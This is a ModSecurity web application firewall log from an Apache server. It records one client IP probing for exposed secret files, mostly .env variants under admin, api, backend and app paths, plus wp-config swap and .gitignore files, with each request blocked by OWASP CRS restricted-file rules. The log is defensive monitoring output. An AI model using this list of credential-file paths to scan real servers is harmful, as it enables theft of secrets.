[Mon May 11 20:55:48.355752 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agImNPjVc-A-CSptvm1xGAAAAEg"]
[Mon May 11 20:55:48.355973 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agImNPjVc-A-CSptvm1xGAAAAEg"]
[Mon May 11 20:55:48.363958 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /.wp-config.php.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.wp-config.php.swp"] [unique_id "agImNJYn-x0CHsbEbP2tEgAAAI8"]
[Mon May 11 20:55:48.364115 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.wp-config.php.swp"] [unique_id "agImNJYn-x0CHsbEbP2tEgAAAI8"]
[Mon May 11 20:55:48.364319 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.wp-config.php.swp"] [unique_id "agImNJYn-x0CHsbEbP2tEgAAAI8"]
[Mon May 11 20:55:48.383959 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/API/.env"] [unique_id "agImNNeaRXe5lR8y0ZOSsgAAAUI"]
[Mon May 11 20:55:48.384114 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/API/.env"] [unique_id "agImNNeaRXe5lR8y0ZOSsgAAAUI"]
[Mon May 11 20:55:48.384331 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/API/.env"] [unique_id "agImNNeaRXe5lR8y0ZOSsgAAAUI"]
[Mon May 11 20:55:48.428675 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/Api/.env"] [unique_id "agImNNeaRXe5lR8y0ZOStQAAAUI"]
[Mon May 11 20:55:48.428843 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/Api/.env"] [unique_id "agImNNeaRXe5lR8y0ZOStQAAAUI"]
[Mon May 11 20:55:48.429052 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/Api/.env"] [unique_id "agImNNeaRXe5lR8y0ZOStQAAAUI"]
[Mon May 11 20:55:48.433263 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/BACK/.env"] [unique_id "agImNJYn-x0CHsbEbP2tFQAAAI8"]
[Mon May 11 20:55:48.433457 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/BACK/.env"] [unique_id "agImNJYn-x0CHsbEbP2tFQAAAI8"]
[Mon May 11 20:55:48.433677 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/BACK/.env"] [unique_id "agImNJYn-x0CHsbEbP2tFQAAAI8"]
[Mon May 11 20:55:48.441388 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/BACKEND/.env"] [unique_id "agImNFNddpkriGUb6ZV2ZQAAAQw"]
[Mon May 11 20:55:48.441579 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/BACKEND/.env"] [unique_id "agImNFNddpkriGUb6ZV2ZQAAAQw"]
[Mon May 11 20:55:48.441792 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/BACKEND/.env"] [unique_id "agImNFNddpkriGUb6ZV2ZQAAAQw"]
[Mon May 11 20:55:48.470137 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /be/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/Be/.env"] [unique_id "agImNDP5Q_-MBliRCAxm3gAAABM"]
[Mon May 11 20:55:48.470350 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/Be/.env"] [unique_id "agImNDP5Q_-MBliRCAxm3gAAABM"]
[Mon May 11 20:55:48.470545 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/Be/.env"] [unique_id "agImNDP5Q_-MBliRCAxm3gAAABM"]
[Mon May 11 20:55:48.546582 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/ADMIN/.env"] [unique_id "agImNFNddpkriGUb6ZV2ZwAAAQw"]
[Mon May 11 20:55:48.546745 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/ADMIN/.env"] [unique_id "agImNFNddpkriGUb6ZV2ZwAAAQw"]
[Mon May 11 20:55:48.546941 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/ADMIN/.env"] [unique_id "agImNFNddpkriGUb6ZV2ZwAAAQw"]
[Mon May 11 20:55:48.582577 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/APP/.env"] [unique_id "agImNCMeXtzav-mi9SyxMgAAANA"]
[Mon May 11 20:55:48.582805 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/APP/.env"] [unique_id "agImNCMeXtzav-mi9SyxMgAAANA"]
[Mon May 11 20:55:48.583047 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/APP/.env"] [unique_id "agImNCMeXtzav-mi9SyxMgAAANA"]
[Mon May 11 20:55:48.606263 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /be/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/BE/.env"] [unique_id "agImNJYn-x0CHsbEbP2tGQAAAI8"]
[Mon May 11 20:55:48.606459 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/BE/.env"] [unique_id "agImNJYn-x0CHsbEbP2tGQAAAI8"]
[Mon May 11 20:55:48.606861 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/BE/.env"] [unique_id "agImNJYn-x0CHsbEbP2tGQAAAI8"]
[Mon May 11 20:55:48.619140 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/Backend/.env"] [unique_id "agImNDP5Q_-MBliRCAxm4QAAABM"]
[Mon May 11 20:55:48.619304 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/Backend/.env"] [unique_id "agImNDP5Q_-MBliRCAxm4QAAABM"]
[Mon May 11 20:55:48.619486 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/Backend/.env"] [unique_id "agImNDP5Q_-MBliRCAxm4QAAABM"]
[Mon May 11 20:55:50.058896 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/admin-app/.env"] [unique_id "agImNjP5Q_-MBliRCAxm5QAAAAo"]
[Mon May 11 20:55:50.059057 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/admin-app/.env"] [unique_id "agImNjP5Q_-MBliRCAxm5QAAAAo"]
[Mon May 11 20:55:50.059270 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/admin-app/.env"] [unique_id "agImNjP5Q_-MBliRCAxm5QAAAAo"]
[Mon May 11 20:55:50.350048 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agImNvjVc-A-CSptvm1xIAAAAEg"]
[Mon May 11 20:55:50.350271 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agImNvjVc-A-CSptvm1xIAAAAEg"]
[Mon May 11 20:55:50.350500 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agImNvjVc-A-CSptvm1xIAAAAEg"]
[Mon May 11 20:55:50.453300 2026] [proxy_fcgi:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:50.481738 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJAAAAIQ"]
